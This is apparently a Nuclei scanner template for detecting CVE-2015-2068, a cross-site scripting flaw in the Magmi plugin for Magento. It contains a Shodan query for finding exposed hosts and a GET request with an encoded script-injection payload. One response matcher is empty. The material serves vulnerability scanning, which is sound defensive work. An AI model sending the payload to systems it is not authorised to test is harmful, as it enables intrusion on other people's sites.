id: CVE-2015-2068 info: name: Magento Server Magmi Plugin - Cross Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php. reference: - https://www.exploit-db.com/exploits/35996 - https://nvd.nist.gov/vuln/detail/CVE-2015-2068 - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html classification: cve-id: CVE-2015-2068 metadata: shodan-query: http.component:"Magento" verified: "true" tags: cve,cve2015,magento,magmi,xss,plugin requests: - method: GET path: - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200